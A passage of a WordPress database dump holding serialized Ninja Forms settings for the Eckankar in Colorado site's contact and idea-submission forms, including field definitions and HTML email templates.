Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_28\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:13:\"listselect_28\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:74;}i:9;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:11:\"textarea_29\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:11:\"textarea_29\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:75;}i:10;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797745321\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"619\";}i:11;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:9:\"submit_31\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:9:\"submit_31\";}s:2:\"id\";i:77;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:46\";s:5:\"label\";s:9:\"Save Form\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:29;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:46\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_23}\";s:13:\"email_subject\";s:42:\"Central Colorado Leadership Communications\";s:13:\"email_message\";s:3691:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_21},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Central Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_21}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_22}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_23}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_24}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_25}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_28}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_29}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<p>If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org</p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:30;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:46\";s:5:\"label\";s:15:\"Success Message\";s:16:\"subs_expire_time\";s:2:\"90\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:31;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:46\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:42:\"Central Colorado Leadership Communications\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3480:\"<p>{field:lastname_22}{field:textbox_21}{field:textbox_21}<br><br><br><br><br><br><br><br><br><br><br><br></p><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr>  <td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Central Colorado Leadership Communications</span> form submission.<br><br><br> </strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Central Colorado ECK organization</em>.<br><br><br> <strong><br><br><br>The following person has requested contact with an ECK representative. Here is the information that </strong> <span style=\"color: #666666\" ;=\"\">{field:textbox_21} {field:lastname_22}</span> has submitted:</p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_21}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_22}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_23}<br><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_24}</span><br><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_25}<br><br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_28}</span></p><br><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_29}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the<br><br><br> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p><p></p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:32;}}s:8:\"settings\";a:30:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:42:\"Central Colorado Leadership Communications\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:01\";s:10:\"form_title\";s:42:\"Central Colorado Leadership Communications\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 18:10:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"4\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:12:{i:0;s:7:\"html_20\";i:1;s:10:\"textbox_21\";i:2;s:11:\"lastname_22\";i:3;s:8:\"email_23\";i:4;s:8:\"phone_24\";i:5;s:13:\"listselect_25\";i:6;s:5:\"hr_26\";i:7;s:7:\"html_27\";i:8;s:13:\"listselect_28\";i:9;s:11:\"textarea_29\";i:10;s:18:\"html_1663797745321\";i:11;s:9:\"submit_31\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(9,'a:7:{s:2:\"id\";i:9;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:18:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:736:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Tell Us Your Ideas!</span></span></span></strong></span></h3>\r\n<span style=\"font-size: 12pt;\"><span style=\"color: #23507d;\"><strong>Do you have an idea to help further the efforts of ECKANKAR in Colorado?</strong></span></span>\r\n\r\nYour ideas are of great value. This process exists for the sole purpose of bringing projects to the fore and putting them into action. If your idea is fully formed but you are unsure about how and where to implement it, we still wish to hear the idea and will do all we can to help you bring it to fruition. Just tell us some details and we will forward your proposal to the right people.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:754:\"<p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Tell Us Your Ideas!</span></span></span></strong></span></h3>\n<span style=\"font-size: 12pt;\"><span style=\"color: #23507d;\"><strong>Do you have an idea to help further the efforts of ECKANKAR in Colorado?</strong></span></span>\n\n<p></p><p>Your ideas are of great value. This process exists for the sole purpose of bringing projects to the fore and putting them into action. If your idea is fully formed but you are unsure about how and where to implement it, we still wish to hear the idea and will do all we can to help you bring it to fruition. Just tell us some details and we will forward your proposal to the right people.</p>\";s:3:\"key\";s:8:\"html_238\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_238\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:78;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_239\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_239\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:79;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_240\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_240\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:80;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11: